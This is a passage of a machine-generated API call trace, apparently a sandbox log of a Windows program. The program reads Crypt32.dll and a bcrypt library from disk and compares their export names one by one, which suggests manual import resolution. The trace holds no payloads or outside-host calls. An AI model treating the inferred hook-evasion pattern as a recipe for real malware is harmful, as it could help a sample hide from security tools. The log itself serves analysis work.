nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d42010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0289.271] CloseHandle (hObject=0x15c) returned 1 [0289.272] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0289.272] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0289.272] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0289.272] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0289.272] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0289.272] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0289.272] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0289.272] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0289.272] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0289.272] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0289.272] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0289.272] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0289.272] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0289.272] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0289.272] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0289.272] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0289.273] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0289.273] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0289.273] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0289.273] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0289.273] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0289.273] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0289.273] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0289.273] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0289.273] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0289.273] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0289.273] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0289.273] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0289.273] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0289.273] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0289.273] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0289.273] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0289.273] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0289.274] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0289.274] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0289.274] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0289.274] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0289.274] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0289.274] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0289.274] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0289.274] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0289.274] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0289.274] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0289.274] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0289.274] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0289.274] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0289.274] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0289.274] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0289.274] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0289.274] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0289.274] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0289.274] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0289.274] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0289.274] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0289.274] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0289.275] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0289.275] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0289.275] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0289.275] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0289.276] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0289.276] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0289.276] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0289.277] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0289.277] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0289.278] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0289.278] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0289.278] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0289.279] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0289.279] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0289.279] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0289.279] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0289.279] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0289.279] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0289.279] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0289.279] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0289.279] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0289.279] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0289.279] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0289.279] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0289.279] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0289.279] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0289.279] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0289.279] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0289.279] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0289.279] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0289.279] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0289.279] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0289.279] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0289.279] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0289.279] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0289.279] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0289.279] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0289.279] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0289.280] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0289.280] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0289.281] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0289.281] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0289.281] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0289.281] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0289.281] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0289.281] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0289.281] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0289.281] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0289.281] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0289.281] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0289.281] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0289.281] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0289.281] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0289.281] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0289.281] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0289.281] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0289.281] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0289.281] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0289.282] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0289.282] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0289.282] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0289.282] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0289.282] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0289.282] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0289.282] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0289.282] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0289.282] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0289.282] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0289.282] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0289.282] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0289.282] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0289.282] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0289.282] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0289.282] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0289.282] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0289.282] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0289.282] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0289.282] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0289.282] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0289.285] GetProcessHeap () returned 0x540000 [0289.285] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2d42010 | out: hHeap=0x540000) returned 1 [0289.286] GetProcessHeap () returned 0x540000 [0289.286] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x5591e0 [0289.287] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0289.295] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0289.296] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0289.296] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0289.297] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0289.297] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0289.297] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0289.297] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0289.297] GetProcessHeap () returned 0x540000 [0289.297] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1c30e0) returned 0x4108040 [0289.434] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0289.434] ReadFile (in: hFile=0x160, lpBuffer=0x4108040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4108040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0289.465] CloseHandle (hObject=0x160) returned 1 [0289.465] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0289.465] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0289.465] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 